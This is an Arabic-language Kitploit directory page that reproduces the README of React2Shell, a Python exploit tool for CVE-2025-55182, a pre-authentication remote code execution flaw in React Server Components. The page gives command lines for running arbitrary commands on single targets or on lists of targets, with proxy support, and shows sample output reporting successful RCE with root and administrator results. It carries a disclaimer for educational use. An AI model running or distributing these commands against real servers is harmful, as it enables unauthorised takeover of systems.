Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
React2Shell — CVE-2025-55182-advanced-scanner | Kitploit
أدوات/GitHubGitHub/ankitspandey07/react2shell
ماسحات الثغرات الأمنيةتوليد الحمولةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالقيادة والسيطرةالفريق الأحمرأداة الوصول عن بعد
GitHubankitspandey07/react2shell

React2Shell

CVE-2025-55182-advanced-scanner

عرض المستودع
منذ 8 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

@#React2Hell — استغلال CVE-2025-55182

🔥 استغلال تنفيذ التعليمات البرمجية عن بُعد (RCE) لخادم Next.js / React

root@kitploit:~
█████▄  ▄▄▄▄▄  ▄▄▄   ▄▄▄▄ ▄▄▄▄▄▄ ████▄ ▄▄▄▄▄  ██  ██ ▄▄▄▄▄ ▄▄    ▄▄    
██▄▄██▄ ██▄▄  ██▀██ ██▀▀▀   ██    ▄██▀ ██▄▄   ██████ ██▄▄  ██    ██    
██   ██ ██▄▄▄ ██▀██ ▀████   ██   ███▄▄ ▄▄▄███ ██  ██ ██▄▄▄ ██▄▄▄ ██▄▄▄ 
                                                                
{MAGENTA} استغلال RCE لخادم Next.js/React — CVE-2025-55182
 المؤلف: Ankit Pandey GitHub: https://github.com/ankitspandey07
    🚀  React2Shell — أداة اختبار أمني  🚀

════════════════════════════════════════════════════════════════════════
usage: new.py [-h] [-u URL] [-l LIST] -c COMMAND [--proxy PROXY] [--proxy-https PROXY_HTTPS]

🚀 نظرة عامة

React2Hell هي أداة استغلال قوية مصممة لاختبار واستغلال CVE-2025-55182، وهي ثغرة تنفيذ تعليمات برمجية عن بُعد حرجة تؤثر على Next.js و React Server Actions.

توجد ثغرة تنفيذ تعليمات برمجية عن بُعد قبل المصادقة في React Server Components الإصدارات 19.0.0 و 19.1.0 و 19.1.1 و 19.2.0 بما في ذلك الحزم التالية: react-server-dom-parcel، react-server-dom-turbopack، و react-server-dom-webpack. يقوم الكود الضعيف بإلغاء تسلسل الحمولات بشكل غير آمن من طلبات HTTP إلى نقاط نهاية Server Function.


✨ الميزات

  • 🧨 تنفيذ التعليمات البرمجية عن بُعد (RCE)
  • 🌐 فحص عنوان URL واحد / فحص جماعي
  • 🧩 تنفيذ أمر مخصص
  • 🕵️‍♂️ وضع التخفي مع دعم الوكيل
  • ⚡ سريع وموثوق وسهل الاستخدام

📌 الاستخدام

تنزيل الأداة

وضع الهدف الواحد

root@kitploit:~
python Scanner.py -u https://target.com -c "whoami"

أهداف متعددة (من ملف)

root@kitploit:~
python Scanner.py -l urls.txt -c "whoami"

مع وكيل HTTP (Burp Suite)

root@kitploit:~
python Scanner.py -u https://target.com -c "whoami" --proxy 127.0.0.1:8080

مع وكيل HTTPS

root@kitploit:~
python Scanner.py -u https://target.com -c "whoami" --proxy-https 127.0.0.1:8080

📁 مثال على urls.txt

root@kitploit:~
http://site1.com
https://site2.com
http://192.168.1.10:3000

🖥️ مثال على الإخراج

root@kitploit:~
PS D:\Ankitspandey07\React2Hell> python.exe .\Scanner.py -l .\list.txt -c whoami


█████▄  ▄▄▄▄▄  ▄▄▄   ▄▄▄▄ ▄▄▄▄▄▄ ████▄ ▄▄▄▄▄  ██  ██ ▄▄▄▄▄ ▄▄    ▄▄    
██▄▄██▄ ██▄▄  ██▀██ ██▀▀▀   ██    ▄██▀ ██▄▄   ██████ ██▄▄  ██    ██    
██   ██ ██▄▄▄ ██▀██ ▀████   ██   ███▄▄ ▄▄▄███ ██  ██ ██▄▄▄ ██▄▄▄ ██▄▄▄ 
                                                                
{MAGENTA} Next.js/React Server RCE Exploit — CVE-2025-55182
 Author: Ankit Pandey GitHub: https://github.com/ankitspandey07
    🚀  React2Shell — Security Testing Utility  🚀

════════════════════════════════════════════════════════════════════════
[+] Loaded 3 targets
════════════════════════════════════════════════════════════════════════

[→] Target: http://evil.com:3113/
[→] Exec:   whoami
[✓] VULNERABLE — RCE Successful!
------------------------------------------------------------
root
------------------------------------------------------------
────────────────────────────────────────────────────────────────────────

[→] Target: http://example.lab:2000/
[→] Exec:   whoami
[✗] Not vulnerable — Status: 200
────────────────────────────────────────────────────────────────────────

[→] Target: https://tale.lab:3000/
[→] Exec:   whoami
[✓] VULNERABLE — RCE Successful!
------------------------------------------------------------
win-1fl835ovldc\\administrator
------------------------------------------------------------
────────────────────────────────────────────────────────────────────────
[✓] Scan complete — Vulnerable: 2
PS D:\Ankitspandey07\React2Hell>

⚠️ إخلاء مسؤولية

تم إنشاء هذه الأداة لأغراض تعليمية وبحث أمني بحت. لا تستخدمها على أنظمة بدون إذن صريح. أنت مسؤول عن أفعالك بنفسك.


⭐ دعم المشروع

إذا ساعدك هذا الاستغلال، فكر في ترك ⭐ على GitHub ❤️


👤 المؤلف

Ankit Pandey; GitHub: https://github.com/Ankitspandey07

صُنع بـ 🔥 بواسطة شخص هو مخترق فخور وشغوف، يزدهر في التعلم في كل خطوة على الطريق.